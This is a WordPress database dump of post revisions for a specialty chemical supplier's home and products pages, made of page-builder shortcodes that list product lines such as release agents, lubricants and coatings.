INSERT INTO `wp_posts` VALUES (161, 1, '2016-08-15 23:19:19', '2016-08-15 23:19:19', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', '', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:19:19', '2016-08-15 23:19:19', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (162, 1, '2016-08-15 23:23:48', '2016-08-15 23:23:48', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:23:48', '2016-08-15 23:23:48', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (163, 1, '2016-08-15 23:29:47', '2016-08-15 23:29:47', 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/cropped-mslogo-1-e1471289515793.png', 'cropped-mslogo-1-e1471289515793.png', '', 'inherit', 'open', 'closed', '', 'cropped-mslogo-1-e1471289515793-png', '', '', '2016-08-15 23:29:47', '2016-08-15 23:29:47', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/cropped-mslogo-1-e1471289515793.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (164, 1, '2016-08-15 23:41:20', '2016-08-15 23:41:20', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>[ninja_form id=10]</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:41:20', '2016-08-15 23:41:20', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (166, 1, '2016-08-15 23:43:23', '2016-08-15 23:43:23', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="boxed"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3></h3>[ninja_form id=10]\r\n\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:43:23', '2016-08-15 23:43:23', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (167, 1, '2016-08-15 23:48:13', '2016-08-15 23:48:13', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:48:13', '2016-08-15 23:48:13', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (168, 1, '2016-08-15 23:48:42', '2016-08-15 23:48:42', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:48:42', '2016-08-15 23:48:42', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (169, 1, '2016-08-16 00:06:13', '2016-08-16 00:06:13', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[ux_product_categories number="10" parent="0" columns="6"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:06:13', '2016-08-16 00:06:13', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (171, 1, '2016-08-16 00:07:51', '2016-08-16 00:07:51', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[ux_product_categories number="5" parent="0" style="text-badge" type="grid" columns="3" offset="0"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:07:51', '2016-08-16 00:07:51', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (173, 1, '2016-08-16 00:10:40', '2016-08-16 00:10:40', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[product_categories number="12" columns="4"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:10:40', '2016-08-16 00:10:40', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (174, 1, '2016-08-16 00:10:53', '2016-08-16 00:10:53', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[product_categories number="6" columns="3"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-16 00:10:53', '2016-08-16 00:10:53', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
